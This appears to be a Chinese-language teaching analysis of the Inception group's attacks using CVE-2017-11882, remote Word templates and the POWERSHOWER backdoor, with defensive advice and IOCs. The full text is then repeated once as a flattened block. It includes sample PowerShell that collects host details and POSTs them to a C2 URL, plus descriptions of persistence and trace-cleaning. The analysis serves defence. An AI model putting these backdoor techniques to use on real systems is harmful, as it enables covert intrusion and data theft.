Inception攻击者利用CVE-2017-11882和POWERSHOWER攻击分析教学文档

一、攻击概述

Inception攻击者自2014年开始活跃，主要针对俄罗斯及欧洲目标发起攻击。本教学文档重点分析其2018年10月利用CVE-2017-11882漏洞和PowerShell后门POWERSHOWER的攻击活动。

二、攻击技术分析

1. 攻击流程概览

初始感染阶段：
- 使用鱼叉式钓鱼邮件投递恶意文档
- 文档通过远程模板加载恶意内容
- 利用CVE-2017-11882漏洞执行恶意代码
Payload释放阶段：
- 释放POWERSHOWER PowerShell后门
- 后门执行侦查、清理痕迹等操作
- 根据C2指令下载执行第二阶段payload

2. 关键技术点

(1) 远程模板利用技术

技术原理：
- Microsoft Word允许文档加载外部存储的模板
- 攻击者将恶意代码放在远程服务器上的模板中
攻击优势：
- 初始文档不含恶意对象，绕过静态分析
- 可根据受害者环境(Word版本、IP等)动态返回不同payload
- 攻击完成后服务器下线，增加分析难度

实现示例：

<w:attachedTemplate r:id="rId1" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>

(2) 漏洞利用(CVE-2017-11882)

漏洞类型：Microsoft Office内存损坏漏洞
利用方式：通过恶意OLE包对象执行VBScript
漏洞效果：绕过安全限制执行任意代码

(3) POWERSHOWER后门分析

初始执行流程：

检查Microsoft Word是否运行
如果Word正在运行：
- 将自身写入%AppData%\Microsoft\Word\log.ps1
- 设置持久化注册表Run Key
- 修改注册表使powershell.exe默认多实例运行
- 终止Word进程
- 清理痕迹：
  - 删除dropper释放的所有文件
  - 清除注册表痕迹
- 收集系统信息并发送到C2
- 退出

主通信循环：

收集系统信息并POST到C2
执行GET请求
根据响应状态码：
- 非200：休眠25-35分钟
- 200响应：
  - "P"开头：写入文件并执行
  - "O"开头：作为VBS代码保存执行
  - 其他：作为PowerShell表达式执行

关键功能代码：

# 信息收集示例
$sysinfo = Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property Name, Domain
$osinfo = Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property Caption, Version
$ipinfo = Get-NetIPAddress | Where-Object {$_.AddressFamily -eq 'IPv4'} | Select-Object -Property IPAddress

# C2通信示例
$response = Invoke-WebRequest -Uri $c2_url -Method Post -Body $collected_data
if($response.StatusCode -eq 200) {
    # 处理响应
    if($response.Content.StartsWith("P")) {
        # 保存执行文件
    }
    # 其他处理逻辑...
}

三、防御建议

1. 漏洞防护

及时安装CVE-2017-11882补丁
禁用Office宏和ActiveX控件
限制远程模板加载功能

2. 检测措施

监控异常PowerShell活动：
- 大量PowerShell实例
- 非常规参数执行
- 从可疑位置加载脚本
检测异常Word行为：
- 加载远程模板
- 异常进程终止

3. 应急响应

确认感染迹象：
- 检查%AppData%\Microsoft\Word\log.ps1
- 查找可疑Run Key注册表项
- 分析PowerShell进程活动
清除步骤：
- 删除恶意脚本文件
- 清理注册表持久化项
- 重置受影响的用户配置

四、攻击特征总结

特征类别	具体表现
初始感染	鱼叉式钓鱼邮件、远程模板加载
漏洞利用	CVE-2017-11882、OLE包VBScript
Payload	POWERSHOWER PowerShell后门
持久化	注册表Run Key、log.ps1文件
C2通信	HTTP POST系统信息、GET指令
反取证	清理dropper文件、注册表痕迹

五、IOC指标

文件路径：%AppData%\Microsoft\Word\log.ps1
注册表项：HKCU\Software\Microsoft\Windows\CurrentVersion\Run
网络特征：特定HTTP POST/GET模式
进程行为：Word异常终止后启动PowerShell

Inception攻击者利用CVE-2017-11882和POWERSHOWER攻击分析教学文档一、攻击概述 Inception攻击者自2014年开始活跃，主要针对俄罗斯及欧洲目标发起攻击。本教学文档重点分析其2018年10月利用CVE-2017-11882漏洞和PowerShell后门POWERSHOWER的攻击活动。二、攻击技术分析 1. 攻击流程概览初始感染阶段：使用鱼叉式钓鱼邮件投递恶意文档文档通过远程模板加载恶意内容利用CVE-2017-11882漏洞执行恶意代码 Payload释放阶段：释放POWERSHOWER PowerShell后门后门执行侦查、清理痕迹等操作根据C2指令下载执行第二阶段payload 2. 关键技术点 (1) 远程模板利用技术技术原理： Microsoft Word允许文档加载外部存储的模板攻击者将恶意代码放在远程服务器上的模板中攻击优势：初始文档不含恶意对象，绕过静态分析可根据受害者环境(Word版本、IP等)动态返回不同payload 攻击完成后服务器下线，增加分析难度实现示例： (2) 漏洞利用(CVE-2017-11882) 漏洞类型：Microsoft Office内存损坏漏洞利用方式：通过恶意OLE包对象执行VBScript 漏洞效果：绕过安全限制执行任意代码 (3) POWERSHOWER后门分析初始执行流程：检查Microsoft Word是否运行如果Word正在运行：将自身写入 %AppData%\Microsoft\Word\log.ps1 设置持久化注册表Run Key 修改注册表使powershell.exe默认多实例运行终止Word进程清理痕迹：删除dropper释放的所有文件清除注册表痕迹收集系统信息并发送到C2 退出主通信循环：收集系统信息并POST到C2 执行GET请求根据响应状态码：非200：休眠25-35分钟 200响应： "P"开头：写入文件并执行 "O"开头：作为VBS代码保存执行其他：作为PowerShell表达式执行关键功能代码：三、防御建议 1. 漏洞防护及时安装CVE-2017-11882补丁禁用Office宏和ActiveX控件限制远程模板加载功能 2. 检测措施监控异常PowerShell活动：大量PowerShell实例非常规参数执行从可疑位置加载脚本检测异常Word行为：加载远程模板异常进程终止 3. 应急响应确认感染迹象：检查 %AppData%\Microsoft\Word\log.ps1 查找可疑Run Key注册表项分析PowerShell进程活动清除步骤：删除恶意脚本文件清理注册表持久化项重置受影响的用户配置四、攻击特征总结 | 特征类别 | 具体表现 | |---------|---------| | 初始感染 | 鱼叉式钓鱼邮件、远程模板加载 | | 漏洞利用 | CVE-2017-11882、OLE包VBScript | | Payload | POWERSHOWER PowerShell后门 | | 持久化 | 注册表Run Key、log.ps1文件 | | C2通信 | HTTP POST系统信息、GET指令 | | 反取证 | 清理dropper文件、注册表痕迹 | 五、IOC指标文件路径： %AppData%\Microsoft\Word\log.ps1 注册表项： HKCU\Software\Microsoft\Windows\CurrentVersion\Run 网络特征：特定HTTP POST/GET模式进程行为：Word异常终止后启动PowerShell